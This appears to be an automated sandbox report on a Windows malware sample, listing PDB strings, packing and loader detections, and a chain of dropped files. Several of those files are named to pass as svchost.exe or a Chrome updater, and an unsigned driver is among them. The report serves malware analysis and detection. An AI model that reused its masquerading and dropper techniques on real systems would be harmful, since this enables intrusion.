Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942214372.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1930774144.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1946961098.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 00000016.00000003.1935382253.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python311.pdb source: TS-240605-Millenium1.exe, 00000002.00000002.1860163508.00007FFDFB16B000.00000040.00000001.01000000.00000005.sdmp, based.exe, 00000008.00000002.2132559008.00007FFDFB16B000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1927279052.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942062017.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1931053908.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2140577670.00007FFE13201000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1933749941.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1935780231.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1939007934.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 00000016.00000003.1930006938.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1926847028.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: based.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: based.exe, 00000008.00000002.2140120247.00007FFE11EBC000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942410950.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1931053908.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2015\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB80B9000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000009.00000002.1905399144.00007FFDFB9AF000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: based.exe, 00000008.00000002.2140404120.00007FFE130C1000.00000040.00000001.01000000.0000001F.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1933749941.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1930774144.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942989444.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000008.00000002.2138737753.00007FFE0EB41000.00000040.00000001.01000000.00000017.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1935780231.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: svchost.exe, 00000016.00000003.1935382253.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: svchost.exe, 00000016.00000003.1958528101.000002C3F582E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: based.exe, based.exe, 00000008.00000002.2137558702.00007FFE007E4000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1941897050.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: based.exe, based.exe, 00000008.00000002.2138314903.00007FFE0E151000.00000040.00000001.01000000.0000001B.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1946961098.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp

Source: TS-240605-Millenium1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: TS-240605-Millenium1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: TS-240605-Millenium1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: TS-240605-Millenium1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: TS-240605-Millenium1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: main.exe.12.dr, AssemblyLoader.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: Update.exe.21.dr, AssemblyLoader.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.1999999146.0000025EB7D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Source: main.exe.12.dr

Static PE information: 0xEE92FC16 [Thu Nov 1 12:09:58 2096 UTC]

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe

Code function: 2_2_00007FFDFB3C2F20 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFDFB3C2F20

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe

File created: C:\ProgramData\Microsoft\__tmp_rar_sfx_access_check_5594093

Jump to behavior

Source: _sqlite3.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xf057
Source: sqlite3.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0xac9c9
Source: _pytransform.dll.22.dr	Static PE information: real checksum: 0x125b11 should be: 0x12c3c0
Source: python311.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0x1aa7fb
Source: libcrypto-3.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0x19efbf
Source: Update.exe.21.dr	Static PE information: real checksum: 0x0 should be: 0x5a6021
Source: unicodedata.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x57c89
Source: _queue.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xaaa4
Source: _socket.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xd687
Source: _ctypes.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1da8e
Source: libcrypto-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x19efbf
Source: _ssl.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1e511
Source: _decimal.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1ebed
Source: main.exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x5a6021
Source: _lzma.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x23865
Source: unicodedata.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x57c89
Source: _bz2.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x13bf2
Source: libffi-8.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: _decimal.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1ebed
Source: based.exe.5.dr	Static PE information: real checksum: 0x76ce9d should be: 0x76b6fa
Source: _socket.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xd687
Source: _hashlib.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x13f78
Source: select.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x81b9
Source: _lzma.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x23865
Source: libssl-3.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0x3a250
Source: _hashlib.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x13f78
Source: setup.exe.12.dr	Static PE information: real checksum: 0x55ddc3 should be: 0x56311d
Source: select.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x81b9
Source: _bz2.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x13bf2
Source: python311.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1aa7fb

Source: TS-240605-Millenium1.exe	Static PE information: section name: _RDATA
Source: Build.exe.0.dr	Static PE information: section name: .didat
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: hacn.exe.5.dr	Static PE information: section name: _RDATA
Source: based.exe.5.dr	Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.6.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.6.dr	Static PE information: section name: .00cfg
Source: python310.dll.6.dr	Static PE information: section name: PyRuntim
Source: s.exe.6.dr	Static PE information: section name: .didat
Source: VCRUNTIME140.dll.7.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.7.dr	Static PE information: section name: _RDATA
Source: libffi-8.dll.7.dr	Static PE information: section name: UPX2
Source: setup.exe.12.dr	Static PE information: section name: .xdata
Source: svchost.exe.12.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.22.dr	Static PE information: section name: .00cfg
Source: libssl-1_1.dll.22.dr	Static PE information: section name: .00cfg
Source: python310.dll.22.dr	Static PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.22.dr	Static PE information: section name: _RDATA
Source: _pytransform.dll.22.dr	Static PE information: section name: .xdata

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_0038125A push ecx; ret	5_2_0038126D
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00381DB0 push ecx; ret	5_2_00381DC3
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6477B506C push rcx; iretd	6_2_00007FF6477B506D
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB86ACDD push rcx; retf 003Fh	7_2_00000235BB86ACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB89C6DD push rcx; retf 003Fh	7_2_00000235BB89C6DE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB8CACDD push rcx; retf 003Fh	7_2_00000235BB8CACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB8872ACDD push rcx; retf 003Fh	8_2_000001EB8872ACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB8875C6DD push rcx; retf 003Fh	8_2_000001EB8875C6DE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB8878ACDD push rcx; retf 003Fh	8_2_000001EB8878ACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B5D06 push r12; ret	8_2_00007FFDFB9B5D08
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B8405 push r10; retf	8_2_00007FFDFB9B8471
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B5CFE push rdx; ret	8_2_00007FFDFB9B5D01
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B5E0F push rsp; ret	8_2_00007FFDFB9B5E17
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B930D push rsp; ret	8_2_00007FFDFB9B930E
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B5CE5 push r8; ret	8_2_00007FFDFB9B5CEB
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B7FEB push r12; ret	8_2_00007FFDFB9B8036
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B5CE0 push r10; retf	8_2_00007FFDFB9B5CE2
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B5DF7 push r10; retf	8_2_00007FFDFB9B5DFA
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B5EFA push r12; ret	8_2_00007FFDFB9B5F07
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B5E58 push rdi; iretd	8_2_00007FFDFB9B5E5A
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B5F56 push r12; ret	8_2_00007FFDFB9B5F6E
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B7F53 push rbp; iretq	8_2_00007FFDFB9B7F54
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B8F28 push rsp; iretq	8_2_00007FFDFB9B8F29
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B7630 push rbp; retf	8_2_00007FFDFB9B7649
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B5C31 push r10; ret	8_2_00007FFDFB9B5C33
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B685F push rsi; ret	8_2_00007FFDFB9B6896
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B8077 push r12; iretd	8_2_00007FFDFB9B808B
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B5F76 push r8; ret	8_2_00007FFDFB9B5F83
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B767B push r12; ret	8_2_00007FFDFB9B76BF
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B82C4 push rdi; iretd	8_2_00007FFDFB9B82C6
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B8DA5 push rsp; retf	8_2_00007FFDFB9B8DA6

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe

File created: C:\ProgramData\svchost.exe

Jump to dropped file

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe

Process created: "C:\Users\user\Desktop\TS-240605-Millenium1.exe"

Sample is not signed and drops a device driver

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Windows\TEMP\gqxqtdeqxchk.sys

Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\_queue.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\_brotli.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75642\select.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\_ctypes.pyd	Jump to dropped file
Source: C:\ProgramData\main.exe	File created: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75642\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\main.exe	File created: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78002\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75642\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75642\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\pyexpat.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78002\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	File created: C:\ProgramData\Microsoft\based.exe	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	File created: C:\ProgramData\setup.exe	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\sqlite3.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78002\libcrypto-1_1.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\libcrypto-3.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75642\python311.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\libcrypto-1_1.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\libssl-1_1.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\_pytransform.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\_cffi_backend.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\setup.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\VCRUNTIME140.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\bcrypt\_bcrypt.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\libssl-3.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\setup.exe	File created: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78122\select.pyd	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\gqxqtdeqxchk.sys	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\nacl\_sodium.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
